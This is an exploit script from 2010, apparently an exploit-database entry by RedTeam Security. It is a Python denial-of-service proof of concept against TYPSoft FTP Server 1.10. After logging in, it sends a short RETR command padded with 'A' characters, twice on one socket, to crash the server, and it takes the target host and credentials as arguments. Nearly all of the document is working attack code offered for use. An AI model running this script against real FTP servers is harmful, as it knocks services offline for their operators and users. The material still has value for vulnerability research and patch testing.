# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS # Date: 5/13/2010 # Author: Jeremiah Talamantes (RedTeam Security) # Software Link: http://sourceforge.net/projects/ftpserv/ # Version: 1.10 # Tested on: Windows XP, SP2 (EN) # DESCRIPTION: # This script exploits a weakness in the RETR command in TYPSoft v1.10 # It requires only a small buffer that is executed in succession within # the same socket connection. #!/usr/bin/python print "\n#################################################################" print "## RedTeam Security ##" print "## TYPSoft FTP Server v1.10 RETR Command DoS ##" print "## ##" print "## Jeremiah Talamantes ##" print "## labs@redteamsecure.com ##" print "################################################################# \n" import socket import sys # Define the exploit's usage def Usage(): print ("Usage: scriptname.py \n") print ("\n\nCredit: Jeremiah Talamantes") print ("RedTeam Security : www.redteamsecure.com/labs\n") # Buffer settings # This works with a relatively small buffer buffer= "A" * 30 def start(hostname, username, password): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Error: unable to connect to host") sys.exit(1) r=sock.recv(1024) print "[+] " + r #Send username to server sock.send("USER %s\r\n" %username) r=sock.recv(1024) # Send password to server sock.send("PASS %s\r\n" %password) r=sock.recv(1024) print "Sending the malicious chars..." # Send data to server sock.send("RETR %s\r\n" %buffer) # Repeat to overflow sock.send("USER %s\r\n" %username) r=sock.recv(1024) sock.send("PASS %s\r\n" %password) r=sock.recv(1024) sock.send("RETR %s\r\n" %buffer) sock.close() if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] password=sys.argv[3] start(hostname,username,password) sys.exit(0) # end